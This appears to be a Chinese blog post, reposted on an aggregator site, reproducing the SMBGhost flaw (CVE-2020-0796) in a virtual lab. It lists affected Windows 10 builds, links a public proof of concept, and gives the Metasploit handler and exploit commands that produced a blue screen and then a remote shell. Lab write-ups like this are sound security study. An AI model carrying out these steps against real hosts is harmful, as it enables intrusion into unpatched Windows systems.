ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

CVE - 2020- 0796复现

2020-06-20 20:53:09  阅读:304  来源: 互联网

标签:10 Windows 192.168 Version 2020 Systems 0796 win10 CVE


复现过程参考:https://xz.aliyun.com/t/7440

https://www.lstazl.com/cve-2020-0796%E5%BE%AE%E8%BD%AF-smbv3%E5%8D%8F%E8%AE%AE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/

下载,安装win10虚拟机。受影响win10版本

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
只影响 SMB v3.1.1,1903和1909

 

关闭自动更新,关闭防火墙

ipconfig确认ip:192.168.229.131

 

 下载漏洞检查工具,这里用的exe版本(奇安信

允许,检测,存在漏洞。

在调整了一下后

靶机win10:192.168.87.128

攻击kali:192.168.87.130

(因为物理机没法执行,所以转战虚拟机)


蓝屏/提权poc :https://github.com/dacade/CVE-POC/tree/master/CVE-2020-0796

kali一个终端打开msf,

use exploit/multi/handler

set payload windows/x64/meterpreter/bind_tcp

set lport 3333(POC默认为3333端口)

set rhost 192.168.87.128

run

 然后在那边执行POC

python exploit.py 192.168.87.128

 回到win10虚拟机,就可以看到蓝屏了。

然后隔壁老王告诉我,执行这个脚本,当目标靶机内存比较小(我这时候设置的4G)就会出现蓝屏,设置高一点(同时脸不要这么黑)

之后调整了一下,把win10靶机设为8G内存,就成功拿到了shell

 

标签:10,Windows,192.168,Version,2020,Systems,0796,win10,CVE
来源: https://www.cnblogs.com/This-is-Y/p/13166766.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有